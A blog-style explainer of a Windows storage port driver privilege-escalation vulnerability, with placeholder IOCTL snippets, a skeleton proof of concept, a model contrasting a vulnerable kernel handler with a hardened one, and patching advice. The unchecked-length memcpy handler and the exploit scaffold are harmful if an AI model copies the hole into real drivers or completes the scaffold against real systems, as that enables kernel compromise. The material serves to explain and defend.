CVE-2024-43560 - Microsoft Windows Storage Port Driver Elevation of Privilege Vulnerability – Explained, With Exploit Details
CVE-2024-43560 is a security vulnerability in the Microsoft Windows Storage Port Driver (storport.sys). It allows a local attacker who already has a low-privilege account to gain SYSTEM-level privileges (the highest level of access on a Windows machine) by exploiting how the driver handles certain requests from non-administrator users.
If left unpatched, a local attacker can escalate their user rights and potentially take full control of the computer. This kind of Elevation of Privilege (EoP) vulnerability is especially dangerous because it is easy to chain with other exploits, sometimes by malware or ransomware, to fully compromise a Windows system once any code execution has been obtained.
- CVE ID: CVE-2024-43560
- Attack vector: local (the attacker must already be able to run code on the machine)
- CVSS score: check Microsoft's advisory for the exact base score; local EoP bugs of this class are typically rated 7.8 or higher.
How did researchers find it?
Security researchers noticed that certain IOCTL (Input/Output Control) requests sent to the storport.sys driver were not properly validated inside the kernel code, allowing normal users to send malformed or malicious requests that could corrupt kernel memory or trigger faulty behavior. (The device name used in the snippets below, \\.\StorPort, is a placeholder; the real device object must be identified by reversing the driver.)
Technical Details
The vulnerability is rooted in insufficient validation of input buffers passed to storport.sys through device IOCTL calls. An attacker can craft a request carrying a specially formed data structure that leads the driver either to overwrite critical kernel structures or to trigger a use-after-free, and either outcome can be turned into privilege elevation. Note that Microsoft's advisory does not document the exact code path; the description here is the general shape of this bug class, and the precise IOCTL and structure layout can only be confirmed by diffing the patched driver against the unpatched one.
Here's how the vulnerability is typically triggered (pseudocode, wrapped in a function so it compiles):

```c
#include <windows.h>

void trigger_vulnerable_ioctl(void)
{
    // Open a handle to the storport device (placeholder device name)
    HANDLE hDevice = CreateFileW(L"\\\\.\\StorPort", GENERIC_READ | GENERIC_WRITE,
                                 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        return;
    }

    BYTE maliciousBuffer[256] = { 0 };
    // Fill maliciousBuffer with data that triggers the overflow or invalid pointer

    DWORD returned = 0;
    DeviceIoControl(
        hDevice,                 // handle to device
        0x222044,                // vulnerable IOCTL code (placeholder)
        maliciousBuffer,         // input buffer
        sizeof(maliciousBuffer), // input buffer size
        NULL,                    // output buffer
        0,                       // output buffer size
        &returned,
        NULL
    );

    CloseHandle(hDevice);
}
```
*(Note: The IOCTL code and method to exploit will differ based on reverse-engineering the patch and actual vulnerability details. This snippet is for illustration.)*
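The user-mode snippet above only shows the request being sent. To make the kernel side of the bug class concrete, here is an added, self-contained model of a METHOD_BUFFERED IOCTL handler, written for this post and not taken from storport.sys or from Microsoft: a vulnerable dispatch routine that trusts an attacker-controlled length field, beside a hardened one that checks the length against both the destination object and the input buffer the caller actually supplied. The request layout, the `KernelContext` object, the 0x222044 IOCTL code and the test harness are all assumptions chosen for illustration; it runs in user mode with the IRP fields stubbed out.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added user-mode model of a buffered IOCTL handler. Structures, IOCTL code
 * and request layout are assumptions for illustration, not storport internals. */

typedef int32_t NTSTATUS;
#define STATUS_SUCCESS                ((NTSTATUS)0x00000000L)
#define STATUS_INVALID_PARAMETER      ((NTSTATUS)0xC000000DL)
#define STATUS_BUFFER_TOO_SMALL       ((NTSTATUS)0xC0000023L)
#define STATUS_INVALID_DEVICE_REQUEST ((NTSTATUS)0xC0000010L)

#define IOCTL_EXAMPLE 0x222044u                 /* the page's placeholder code */
#define PAYLOAD_SIZE  64
#define GOOD_CALLBACK ((uintptr_t)0xC0DEC0DEu)  /* stand-in for a valid pointer */

/* The IRP / IO_STACK_LOCATION fields a buffered IOCTL handler reads. */
typedef struct {
    uint32_t IoControlCode;
    uint32_t InputBufferLength;   /* length the caller passed to DeviceIoControl */
    void    *SystemBuffer;        /* kernel copy of the caller's input buffer */
} MockIrp;

/* Hypothetical request layout: header, then PayloadLength bytes of data. */
typedef struct {
    uint32_t Magic;
    uint32_t PayloadLength;       /* attacker-controlled */
} RequestHeader;

/* Kernel-side object the handler fills in. The pointer that sits right
 * after the buffer is what an overflow corrupts. */
typedef struct {
    uint8_t   Payload[PAYLOAD_SIZE];
    uintptr_t Callback;
} KernelContext;

/* Vulnerable handler: trusts every length the caller supplied. */
NTSTATUS vulnerable_dispatch(KernelContext *ctx, const MockIrp *irp) {
    if (irp->IoControlCode != IOCTL_EXAMPLE) return STATUS_INVALID_DEVICE_REQUEST;
    const RequestHeader *hdr = (const RequestHeader *)irp->SystemBuffer;
    /* BUG: no check that InputBufferLength covers the header, that PayloadLength
     * fits in Payload, or that PayloadLength bytes were actually supplied. */
    memcpy((uint8_t *)ctx, hdr + 1, hdr->PayloadLength); /* Payload is the first member */
    return STATUS_SUCCESS;
}

/* Hardened handler: every length is validated before memory is touched. */
NTSTATUS hardened_dispatch(KernelContext *ctx, const MockIrp *irp) {
    if (irp->IoControlCode != IOCTL_EXAMPLE) return STATUS_INVALID_DEVICE_REQUEST;
    if (irp->InputBufferLength < sizeof(RequestHeader)) return STATUS_BUFFER_TOO_SMALL;
    const RequestHeader *hdr = (const RequestHeader *)irp->SystemBuffer;
    /* Destination bound: the copy must fit in the kernel object. */
    if (hdr->PayloadLength > PAYLOAD_SIZE) return STATUS_INVALID_PARAMETER;
    /* Source bound: only read what the caller really passed in. Written as a
     * subtraction (safe after the header check) so it cannot wrap. */
    if (hdr->PayloadLength > irp->InputBufferLength - sizeof(RequestHeader))
        return STATUS_INVALID_PARAMETER;
    memcpy(ctx->Payload, hdr + 1, hdr->PayloadLength);
    return STATUS_SUCCESS;
}

typedef struct { NTSTATUS status; bool callback_intact; } Outcome;

/* Build a constructed attacker request that claims `claimed` payload bytes
 * (all 0x41) but whose IRP says only `supplied` of them were passed in, run it
 * through `dispatch`, and report whether the adjacent pointer survived. */
Outcome exercise(NTSTATUS (*dispatch)(KernelContext *, const MockIrp *),
                 uint32_t claimed, uint32_t supplied) {
    uint8_t request[256] = {0};
    RequestHeader hdr = { 0x53544F52u, claimed };
    if (claimed > (uint32_t)(sizeof request - sizeof hdr))
        claimed = (uint32_t)(sizeof request - sizeof hdr);
    memcpy(request, &hdr, sizeof hdr);
    memset(request + sizeof hdr, 0x41, claimed);  /* keeps over-reads inside request[] */
    KernelContext ctx = { {0}, GOOD_CALLBACK };
    MockIrp irp = { IOCTL_EXAMPLE, (uint32_t)(sizeof hdr + supplied), request };
    Outcome o;
    o.status = dispatch(&ctx, &irp);
    o.callback_intact = (ctx.Callback == GOOD_CALLBACK);
    return o;
}

int main(void) {
    uint32_t overflow = PAYLOAD_SIZE + (uint32_t)sizeof(uintptr_t);
    Outcome v = exercise(vulnerable_dispatch, overflow, overflow);
    Outcome h = exercise(hardened_dispatch, overflow, overflow);
    printf("vulnerable: status=0x%08X callback_intact=%d\n", (unsigned)v.status, v.callback_intact);
    printf("hardened:   status=0x%08X callback_intact=%d\n", (unsigned)h.status, h.callback_intact);
    return 0;
}
```

The two checks in the hardened routine correspond to the two ways the vulnerable one can be abused: a claimed length larger than the destination overwrites the pointer after the buffer (the write primitive the post describes), and a claimed length larger than the supplied input makes the driver read past the caller's data into adjacent kernel memory. A real driver would also reject unknown `Magic` values and, for METHOD_NEITHER IOCTLs, probe the user pointers before use.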
Proof of Concept (PoC) Exploit
After the initial advisory, security researchers and exploit writers often diff the patched driver against the previous version to locate the fix, then write proof-of-concept code demonstrating the privilege escalation. A PoC typically opens a handle to the driver's device object, sends the crafted IOCTL, and then checks whether the calling process has been elevated.
Here's a simple skeleton PoC (DO NOT USE MALICIOUSLY):

```c
#include <windows.h>
#include <stdio.h>

int main(void) {
    // Open the driver's device object. The device name is a placeholder;
    // the real path must come from reversing the patched driver.
    HANDLE hDevice = CreateFileW(L"\\\\.\\StorPort", GENERIC_READ | GENERIC_WRITE,
                                 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device: %lu\n", GetLastError());
        return 1;
    }

    BYTE inputBuffer[512] = { /* maliciously crafted input */ 0 };
    DWORD bytesReturned = 0;

    // IOCTL code (to be determined from reversing, placeholder here):
    DWORD ioctlCode = 0x222044;

    if (!DeviceIoControl(hDevice, ioctlCode, inputBuffer, sizeof(inputBuffer),
                         NULL, 0, &bytesReturned, NULL)) {
        printf("DeviceIoControl failed: %lu\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }

    // Reaching this point only means the driver accepted the request; a real
    // exploit would now verify the elevation, e.g. by checking the process token.
    printf("IOCTL accepted by the driver.\n");
    CloseHandle(hDevice);
    return 0;
}
```
*(Note: The actual exploit may require considerably more work, such as heap grooming and a reliable way to turn the memory corruption into a token overwrite, and is not shared here for ethical and legal reasons.)*
Affected Systems
- All unpatched Windows 10, Windows 11, and Windows Server versions; storport.sys ships in every supported Windows build.
- Any scenario where local users can execute code on a machine (shared computers, terminal servers, servers with permissive policies, or a foothold obtained through another exploit), since the attacker only needs a low-privilege local account.
Mitigation and Detection
1. Install the October 2024 security update that addresses CVE-2024-43560. For administrators: deploy it through WSUS or your enterprise patch-management tooling, and get the latest update information directly from the Microsoft Security Response Center (MSRC).
2. Monitor for suspicious activity. Windows does not log DeviceIoControl calls by default, so failed or unusual IOCTLs to storage devices are only visible through EDR or kernel ETW telemetry; in the standard event logs, watch instead for unexpected privilege elevations, such as a process launched from an ordinary user session that is suddenly running as SYSTEM.
References
- Microsoft Security Advisory: CVE-2024-43560
- MITRE CVE Record for CVE-2024-43560
- Twitter thread from researcher @windowsdetective summarizing the bug
- Windows Kernel Exploitation Techniques
Conclusion
CVE-2024-43560 is a kernel-level vulnerability that lets local attackers become SYSTEM on vulnerable Windows machines. If you are responsible for Windows environments, patch now and monitor for post-patch exploitation attempts. Vulnerabilities like this are often integrated quickly into attacker toolkits, so stay ahead by keeping systems up to date.
Always patch, always monitor, and never underestimate local privilege escalation bugs: they are a favorite tool for adversaries to take over your systems.
*If you found this post helpful, consider sharing it with your IT or security team. For questions about patch deployment or detection, use the Microsoft links above or drop a message below!*
Timeline
Published on: 10/08/2024 18:15:22 UTC
Last modified on: 10/13/2024 01:02:37 UTC